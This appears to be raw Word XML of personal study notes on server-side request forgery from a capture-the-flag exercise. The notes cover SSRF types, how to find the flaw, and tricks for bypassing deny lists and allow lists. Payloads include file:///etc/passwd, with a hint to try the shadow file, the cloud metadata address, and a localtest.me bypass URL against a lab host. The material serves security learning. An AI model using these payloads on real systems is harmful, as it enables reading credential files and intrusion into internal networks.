        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r w:rsidR="00AA747C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>file:///etc/passwd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AA747C">
        <w:t xml:space="preserve"> (try for shadow too)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBE9A8A" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="007A6E65" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId102" w:anchor="file" w:history="1">
        <w:r w:rsidR="00AA747C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E3B910C" w14:textId="20C46539" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>additional payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296BEE10" w14:textId="1E15946E" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SSRF Continued</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEC0B1D" w14:textId="085D71F8" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>What is an SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9EE05" w14:textId="653D3DD1" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>vuln that allows a malicious user to cause the webserver to make an additional or edited HTTP request to the resource of the attackers choosing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79797522" w14:textId="35AEEE49" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>regular SSRF – data returned to attackers screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F82D68" w14:textId="48FB1F43" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Blind SSRF – attack occurs, but no information is returned to the attackers screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EB1F9C" w14:textId="3DF61A1F" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Leads to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2554E916" w14:textId="581B89B3" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>access to unauthorized areas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337E6D99" w14:textId="0326ECD5" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>access to customer/organizational data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07586606" w14:textId="4FB19766" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ability to scale to internal networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0A0383" w14:textId="0E1B7BA8" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reveal authentication tokens/credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F638671" w14:textId="0A7F5A95" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SSRF Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7715CD2D" w14:textId="77777777" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69E35C1F" wp14:editId="2D8B53B6">
            <wp:extent cx="2476500" cy="2685087"/>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3" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2479597" cy="2688444"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1838E" w14:textId="77777777" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05E8D762" wp14:editId="6C827CF9">
            <wp:extent cx="3295650" cy="3332942"/>
            <wp:effectExtent l="0" t="0" r="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4">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3300133" cy="3337476"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B80E921" w14:textId="77777777" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41C25EEA" wp14:editId="042B9A5B">
            <wp:extent cx="2895600" cy="2845961"/>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5" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2899102" cy="2849403"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C2C91D" w14:textId="17CD56A0" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00E77306">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47782AD0" wp14:editId="4018F457">
            <wp:extent cx="2828925" cy="2869629"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="8" name="Picture 8"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low confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId106" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2831608" cy="2872351"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="170FB0CC" w14:textId="76C58651" w:rsidR="00E77306" w:rsidRDefault="00E77306" w:rsidP="00CE3405">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Finding an SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BED946" w14:textId="081EC2F3" w:rsidR="00E77306" w:rsidRDefault="00C31217" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When a full URL is used in a parameter in the address bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29968E" w14:textId="41BD481E" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hidden field in a form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15847188" w14:textId="701160E7" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>a partial URL such as just the hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BF8024" w14:textId="18B1C720" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00E77306">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>only the path of the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7730E080" w14:textId="0723A56B" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Defeating Common SSRF Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8DB775" w14:textId="51A784A5" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Deny List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22989019" w14:textId="022BB888" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>using alternative localhost references that have a DNS record which resolves to the IP address 127.0.0.1 such as 127.0.0.1.nip.io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6252D846" w14:textId="6A878460" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>in cloud environments, 169.254.169.254 contains metadata for the deployed cloud server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE5893" w14:textId="4035A530" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>attacker can register a subdomain on their own domain with a DNS record that points to this IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650EFC33" w14:textId="683D29EB" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Allow List</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7E1BAD" w14:textId="3D6B7378" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">attacker can create a subdomain on an attackers domain name, such as </w:t>
      </w:r>
      <w:hyperlink r:id="rId107" w:history="1">
        <w:r w:rsidRPr="001005BA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://website.thm.attackers-domain.thm</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4352A857" w14:textId="6195431D" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>application logic would allow input and let an attacker control the internal HTTP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363C87F4" w14:textId="6889CBD8" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Open Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095E1A14" w14:textId="69C46482" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>an endpoint on the server where the website visitor gets automatically redirected to another website address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E50B1AF" w14:textId="2D0C20A5" w:rsidR="00C31217" w:rsidRDefault="00C31217" w:rsidP="00C31217">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>a potential SSRF vulnerability allows the attacker to use the above feature to redirect the internal HTTP request to a domain of the attackers choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A677BE" w14:textId="18628832" w:rsidR="00CE3405" w:rsidRDefault="00CE3405" w:rsidP="00CE3405">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>AoC2020 Exercise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F781542" w14:textId="017246AA" w:rsidR="00CE3405" w:rsidRDefault="00CE3405" w:rsidP="00CE3405">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Database List that accepts user input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180DABF2" w14:textId="0254A1DE" w:rsidR="00CE3405" w:rsidRDefault="00CE3405" w:rsidP="00CE3405">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>output URL can be run through a URL Decoder to look for important values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D260F9" w14:textId="2C47289B" w:rsidR="00CE3405" w:rsidRDefault="00CE3405" w:rsidP="00CE3405">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>indicators of internal hostnames for example that refer to a backend machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED9973" w14:textId="7289C765" w:rsidR="00CE3405" w:rsidRDefault="0023791E" w:rsidP="00CE3405">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>attempt to navigate to root of same site, which is the URL portion before the search function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB3752A" w14:textId="16DAAEA1" w:rsidR="0023791E" w:rsidRDefault="0023791E" w:rsidP="0023791E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>return of a response, even a 404, indicates attacker can make server request modified URL and return response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6A2383" w14:textId="616D6A31" w:rsidR="0023791E" w:rsidRDefault="0023791E" w:rsidP="0023791E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try to search for valid URLs within backend host site or try using different ports to determine additional running services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8FD788" w14:textId="3FD5D543" w:rsidR="0023791E" w:rsidRDefault="0023791E" w:rsidP="0023791E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>port number will be in the URL encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09635059" w14:textId="0D8A49BE" w:rsidR="0023791E" w:rsidRDefault="0023791E" w:rsidP="0023791E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>connection refused – probably closed, connection reset by peer – likely open but wrong request type [http sent to ssh for example]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3BBDB7" w14:textId="6CF6BEB0" w:rsidR="0023791E" w:rsidRDefault="0023791E" w:rsidP="0023791E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>even if error messages aren’t returned, measuring time between request and response can indicate likely ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FE6431" w14:textId="57C6640A" w:rsidR="0023791E" w:rsidRDefault="0023791E" w:rsidP="0023791E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>try replacing backend hostname with localhost or 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F8AD3F" w14:textId="5CF814DB" w:rsidR="0023791E" w:rsidRDefault="0023791E" w:rsidP="0023791E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>blocks of this kind of attack can be circumnavigated</w:t>
      </w:r>
      <w:r w:rsidR="000124A1">
        <w:t xml:space="preserve"> using DNS subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3444F2EC" w14:textId="7DA4C15B" w:rsidR="000124A1" w:rsidRDefault="000124A1" w:rsidP="000124A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create own domain using backend_hostname.&lt;evilsite&gt;.com that resolves to 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349ACB5A" w14:textId="7D4B0A64" w:rsidR="000124A1" w:rsidRDefault="000124A1" w:rsidP="000124A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can use localtest.me to do this as it resolves every subdomain to 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA9E88" w14:textId="139B305D" w:rsidR="000124A1" w:rsidRDefault="000124A1" w:rsidP="000124A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>set hostname in URL to backend_hostname.localhost.me within URL encode and bypass check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439B0E51" w14:textId="67BE7D01" w:rsidR="000124A1" w:rsidRDefault="000124A1" w:rsidP="000124A1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:hyperlink r:id="rId108" w:history="1">
        <w:r w:rsidR="00750D11" w:rsidRPr="007B03E7">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.45.228/?proxy=http%3A%2F%2Flist.hohoho.localtest.me</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4660F3F7" w14:textId="7F62D4C6" w:rsidR="00750D11" w:rsidRDefault="00750D11" w:rsidP="00750D11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enumerate for helpful information for privesc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E386F5F" w14:textId="77777777" w:rsidR="00AA747C" w:rsidRDefault="00AA747C" w:rsidP="00AA747C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exercise</w:t>
      </w:r>
    </w:p>
